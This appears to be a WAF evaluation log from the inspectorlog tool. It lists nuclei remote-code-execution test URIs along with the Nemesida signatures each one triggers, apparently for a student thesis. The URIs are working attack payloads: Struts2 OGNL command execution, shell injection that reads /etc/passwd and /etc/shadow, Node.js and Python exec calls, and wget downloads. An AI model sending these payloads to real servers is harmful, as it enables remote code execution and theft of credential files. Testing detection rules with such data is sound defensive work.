# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l rce.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_dinamica/owasp/opensource/nuclei/rce.clean
Packet [4]	Uri [/web/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300001871]
Packet [5]	Uri [/web/password_change.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [10]	Uri [/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [12]	Uri [/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [19]	Uri [/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt]	Nattacks [1]	Signatures	[300001559]
Packet [25]	Uri [/web/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///]	Nattacks [1]	Signatures	[300001840]
Packet [26]	Uri [/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [27]	Uri [/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [33]	Uri [/web/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D]	Nattacks [5]	Signatures	[300000069]	[300001559]	[300002700]	[300002718]	[300002827]
Packet [34]	Uri [/web/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test]	Nattacks [3]	Signatures	[300000037]	[300002759]	[300002799]
Packet [37]	Uri [/web/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json]	Nattacks [2]	Signatures	[300000052]	[300001026]
Packet [44]	Uri [/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D]	Nattacks [2]	Signatures	[300000037]	[300001871]
Packet [50]	Uri [/web/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5]	Nattacks [6]	Signatures	[300000051]	[300000052]	[300000069]	[300001026]	[300001031]	[300001085]
Packet [51]	Uri [/web/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow]	Nattacks [1]	Signatures	[300001559]
Packet [54]	Uri [/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23]	Nattacks [3]	Signatures	[300000051]	[300000069]	[300001559]
Packet [55]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)]	Nattacks [1]	Signatures	[300001026]
Packet [66]	Uri [/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)]	Nattacks [1]	Signatures	[300001026]
Packet [68]	Uri [/web/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;]	Nattacks [4]	Signatures	[300000051]	[300000053]	[300001053]	[300002413]
Packet [72]	Uri [/web/poc.jsp?cmd=cat+%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300001516]	[300001559]
Packet [74]	Uri [/web/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))]	Nattacks [6]	Signatures	[300000052]	[300000069]	[300001559]	[300002700]	[300002708]	[300002757]
Packet [75]	Uri [/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [76]	Uri [/web/page/exportImport/uploadOperation.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [81]	Uri [/web/page/exportImport/fileTransfer/poc.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [90]	Uri [/web/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1]	Nattacks [1]	Signatures	[300001559]
Packet [100]	Uri [/web/infusions/downloads/downloads.php?cat_id=${system(ls)}]	Nattacks [2]	Signatures	[300000037]	[300001026]
Packet [101]	Uri [/web/mgmt/tm/util/bash]	Nattacks [1]	Signatures	[300001823]
Packet [103]	Uri [/web/.%0d./.%0d./.%0d./.%0d./bin/sh]	Nattacks [2]	Signatures	[300001053]	[300001845]
Packet [104]	Uri [/web/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;]	Nattacks [3]	Signatures	[300000051]	[300000052]	[300001007]
Packet [110]	Uri [/web/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://%27);//]	Nattacks [5]	Signatures	[300000034]	[300000051]	[300000052]	[300002700]	[300002815]
Packet [117]	Uri [/web/cgi-bin/system_mgr.cgi?]	Nattacks [1]	Signatures	[300001513]
Packet [118]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [129]	Uri [/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users]	Nattacks [1]	Signatures	[300001513]
Packet [131]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300001497]	[300001559]
Packet [133]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [136]	Uri [/web/index.php?s=/home/page/uploadImg]	Nattacks [1]	Signatures	[300002734]
Packet [139]	Uri [/web/webadmin/script?command=|%20nslookup%20]	Nattacks [1]	Signatures	[300002760]
Packet [140]	Uri [/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [143]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [145]	Uri [/web/cgi-bin/system_mgr.cgi?]	Nattacks [1]	Signatures	[300001513]
Packet [155]	Uri [/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users]	Nattacks [1]	Signatures	[300001513]
Packet [156]	Uri [/web/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300001497]	[300001559]
Packet [158]	Uri [/web/index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [161]	Uri [/web/index.php?s=/home/page/uploadImg]	Nattacks [1]	Signatures	[300002734]
Packet [164]	Uri [/web/webadmin/script?command=|%20nslookup%20]	Nattacks [1]	Signatures	[300002760]
Packet [165]	Uri [/web/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [168]	Uri [/web/cgi-bin/mainfunction.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [170]	Uri [/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget]	Nattacks [1]	Signatures	[300001513]
Packet [171]	Uri [/web?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23]	Nattacks [4]	Signatures	[300000052]	[300000069]	[300001359]	[300001559]
Packet [176]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [178]	Uri [/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300000053]	[300001559]
Packet [181]	Uri [/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd]	Nattacks [2]	Signatures	[300000053]	[300001559]
Packet [185]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [186]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [188]	Uri [/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget]	Nattacks [1]	Signatures	[300001513]
Packet [190]	Uri [/web/cgi-bin/mainfunction.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [195]	Uri [/web/cgi-bin/slogin/login.py]	Nattacks [1]	Signatures	[300001513]
Packet [202]	Uri [/web/cgi-bin/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [203]	Uri [/web/index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [204]	Uri [/web/index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [205]	Uri [/web/login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [206]	Uri [/web/login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [207]	Uri [/web/login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}]	Nattacks [6]	Signatures	[300000037]	[300000052]	[300000069]	[300001072]	[300002708]	[300002717]
Packet [208]	Uri [/web/index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [209]	Uri [/web/index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
Packet [210]	Uri [/web/index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D]	Nattacks [6]	Signatures	[300000037]	[300000069]	[300001072]	[300002700]	[300002708]	[300002717]
# N. packets [210], [65] with alerts, N. Alerts [174]
# Execution time: 0.105761 s
